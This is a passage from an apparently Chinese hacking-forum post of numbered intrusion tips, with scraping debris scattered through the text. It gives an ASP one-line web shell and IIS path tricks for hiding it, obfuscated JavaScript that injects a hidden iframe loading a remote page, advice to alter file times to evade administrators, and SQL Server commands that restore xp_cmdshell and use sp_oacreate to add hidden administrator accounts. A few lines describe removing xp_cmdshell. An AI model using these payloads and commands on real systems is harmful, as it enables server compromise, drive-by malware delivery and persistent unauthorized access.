( e. }6 Y& I7 ?# l8 k执行后可以用AT命令查看新加的任务* {$ M4 r$ t2 k6 x) j2 e3 _
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
+ P* e# a w6 G( i2 T. |; x6 Q1 r3 x! f/ {
53、隐藏ASP后门的两种方法
) V9 b+ y: q4 Z3 T' N- e+ c5 w' b1、建立非标准目录:mkdir images..\
: \$ k. K' f/ S, B' w8 I拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 l6 h+ o" B9 b% f3 _% ?' Q% h
通过web访问ASP木马:http://ip/images../news.asp?action=login5 V" X z4 @" L8 L
如何删除非标准目录:rmdir images..\ /s
/ F. N0 i* P7 N; J2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:+ }+ ]. x6 Y) m" ], x1 E
mkdir programme.asp
% R) ]/ r n. H8 U* ]: @0 W7 J5 l新建1.txt文件内容:<!--#include file=”12.jpg”-->1 A1 i( {1 m0 \3 n+ R
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! C ~. a& {- k- d7 {
attrib +H +S programme.asp
) r8 m W! o4 r# I+ O通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: g; k- D8 U5 R0 {9 z T
e$ a5 y( u- }7 i% r* S
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
. k- U0 n/ r) l: h然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
9 y8 [5 J: b6 K: K+ g2 T
. g4 B9 J I/ n) x( K+ B* j55、JS隐蔽挂马
2 Y4 J+ |. r; X& z* t1.
/ S Y8 `8 ~ D ]var tr4c3="<iframe src=ht";+ S8 D( D6 D$ Z% w- |
tr4c3 = tr4c3+"tp:/";
3 A" g0 U1 P5 S- U) t6 a: ytr4c3 = tr4c3+"/ww"; ]/ F0 v/ N6 V( W+ H8 f* n: |
tr4c3 = tr4c3+"w.tr4";3 h; U% \$ z# S- r
tr4c3 = tr4c3+"c3.com/inc/m";, M! i0 |/ C6 u8 j$ X2 t, s; p7 W
tr4c3 = tr4c3+"m.htm style="display:none"></i";) T; a, ?, y' M, \
tr4c3 =tr4c3+"frame>'";. F% \1 X+ J2 N! R
document.write(tr4c3);$ m# a1 f G( j6 r' b4 T
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
6 }4 b9 i7 {; f1 W9 P& g) G/ B& W- n: y: k2 r; {
2.
7 e/ J) @/ n& b' q4 g4 ^3 f转换进制,然后用EVAL执行。如
4 F6 C" t4 f- M# u* e! U0 x leval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, r' [9 N" f6 I0 \: O不过这个有点显眼。2 V: b0 o6 `3 [7 e |/ z, m' @
3.5 O; c# w) w" Q( u, A3 I) O/ y7 R
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
8 `9 J' y( w8 `6 s! Y2 q9 v最后一点,别忘了把文件的时间也修改下。
. J' x0 W0 D: L+ E/ m" T3 [7 x& J I$ G* I0 O
56.3389终端入侵常用DOS命令
# |9 ?! Z& v( h! utaskkill taskkill /PID 1248 /t
- v$ J& A8 v1 ]. y8 {& i9 ~2 \$ C
e! V* L% }' t; u4 c/ mtasklist 查进程! j G* c1 X( q' z( e2 L
) m4 C) E0 d2 B1 p, E, mcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
+ F2 _# T2 \: X$ diisreset /reboot: }$ r( {2 L( a2 D4 X+ a! p
tsshutdn /reboot /delay:1 重起服务器" s5 Q! j( l3 o- w1 T4 ?/ U5 V
+ ^7 ]' w4 L: K5 j# u
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户," {2 ]5 S% e6 ^5 U# n
: v( Z# ~& h( I6 l; l: }
query user 查看当前终端用户在线情况3 h1 n% ?% z7 f$ {8 i5 R* X' ^
7 Y* N: s x w3 p. v9 n$ u
要显示有关所有会话使用的进程的信息,请键入:query process *0 F+ R7 S% ?/ Q* T- G
) O+ O# b: w( S+ h% ]* Z6 q& ]要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
8 `( v* |/ A. E$ d: K7 a ]" c+ s4 h; s7 }) p
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2' ?' z$ Q. o( l; A6 D" m8 y
2 q. H% B: H3 Q/ `要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
& L, K# C) h. r6 k! F0 n* W5 S8 e/ J( I% A, k5 J
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' ^/ k6 y# p* w# y) x
7 a( X3 Y% U# F! r; S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统* n$ W( z( c @+ G) W5 D
- U* _9 b7 m& P1 ^+ z4 ]
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。) Q. Q% X0 u; P2 v2 r
) N$ Y7 \4 q2 y( A2 i+ [0 u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 Q2 `% J' J2 Q& H6 ~
* q9 U, r! @3 F' {' a- a56、在地址栏或按Ctrl+O,输入:
5 a% \% F1 ~ njavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
4 t( p2 Z( q; W# a
2 C z) } R7 V: ~源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。) O7 a, u( n( O. h" p
: l' S/ ?( f7 S* s# p57、net user的时候,是不能显示加$的用户,但是如果不处理的话,; j* k) o9 X0 z! t
用net localgroup administrators是可以看到管理组下,加了$的用户的。) }1 D$ g P6 V$ h4 p
: U2 k9 ]) p, {% d4 k58、 sa弱口令相关命令
% @5 Q {! J' G1 ?# b# |% \7 |3 y# Y: P) |' T y0 s6 m
一.更改sa口令方法:
" n1 z1 {% i. @* l! X8 N用sql综合利用工具连接后,执行命令:. t5 c( n ~6 A! s2 L9 P0 V5 v
exec sp_password NULL,'20001001','sa'
0 h! w9 D2 E7 @& _(提示:慎用!)0 i) A; \0 I8 Q" V7 ~" R; w) V
b& V* b0 }8 i% n; ]+ U# @
二.简单修补sa弱口令.9 Y6 w7 {7 t$ P: f% i/ Q# F5 o8 \
9 s2 T9 ^/ V7 `5 ], f" J/ G方法1:查询分离器连接后执行:
1 ^/ P; l7 Z% s, \9 Tif exists (select * from
) b5 \) P3 T, H$ u: R9 a( jdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and3 p, C0 M7 B* \$ j. u) k) K
OBJECTPROPERTY(id, N'IsExtendedProc') = 1). ^3 @: w7 p3 z+ o
& c$ L0 G/ g6 a( G6 v: aexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'$ N: e: u+ s. [* R* l& E
7 X. k5 E* j3 T* b! JGO
+ X6 Q4 n. I6 y# e
R6 J* B" F) f) ~$ Q4 T然后按F5键命令执行完毕7 T8 l, [7 y4 \' M5 a
# W8 y p. }& S* B$ c- E方法2:查询分离器连接后 L+ M# {0 @4 S
第一步执行:use master6 o- c0 `, C6 v. X
第二步执行:sp_dropextendedproc 'xp_cmdshell'% T& l$ v) J- a) M" V" U
然后按F5键命令执行完毕
& p2 t7 _$ g5 j9 q; N
6 U& j$ t" C% D, [2 b' d4 C, r: [2 T% j
三.常见情况恢复执行xp_cmdshell.
) L1 G) V4 K' c C9 d9 k9 G( }/ {0 x4 Q5 L
$ H4 m( r% ?' B' S
1 未能找到存储过程'master..xpcmdshell'.
2 b* C5 ~6 J) \% U5 d 恢复方法:查询分离器连接后,
" L( n9 |) ~( h2 U) x/ P. S第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 d* n# q8 q3 [6 q$ Y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! G3 z. F, N* l k( O1 R) Z! C
然后按F5键命令执行完毕( b9 W% n5 O0 @* R/ o
) R2 a; Y1 r x2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)1 l* x% B% Z d& `! ~$ o9 F4 y
恢复方法:查询分离器连接后,/ y* k3 x0 E1 l# j
第一步执行:sp_dropextendedproc "xp_cmdshell"
' T5 C, J. I s+ J* Y/ B9 R" ^第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 |8 M. `2 [) f7 f/ Z+ g8 L2 d/ U然后按F5键命令执行完毕* h) l9 a0 `2 B0 _" S
) A! A& M* z5 y2 v3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)$ u! F) N' Z9 o0 V
恢复方法:查询分离器连接后,( L' Y3 G( } o3 f4 t% y% ~
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
0 T5 K2 Z) P# [2 [7 N" U6 Z8 e第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 0 x! d+ Y! t8 g ]
然后按F5键命令执行完毕5 C: V" A/ ~& |: q! ]: _
/ S( G+ _5 H0 T8 _; l
四.终极方法.
! f0 T0 u+ w6 L" \$ C& W6 b2 G如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: }0 H& q( H5 [, M
查询分离器连接后, {! |) }% N9 _8 m! d! B
2000servser系统:
# \3 @ F' E% q: M- [/ T2 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
+ r0 S& Y) q/ ~+ }: S1 }/ `5 I; H0 v7 _( U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'" s; D% R2 ]% U: ^5 {0 W5 T. @
7 Z4 z9 j( i5 _8 Axp或2003server系统:
* n. m" Q. H0 v' e
8 }' A3 H4 K+ W$ wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'9 Q5 I7 ?& d6 b/ A
5 i. r5 F8 C1 `( Y, ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add') _2 A( K$ n! _7 G- r3 T
|
发表于 2012-9-15 14:51:03
收藏
支持
反对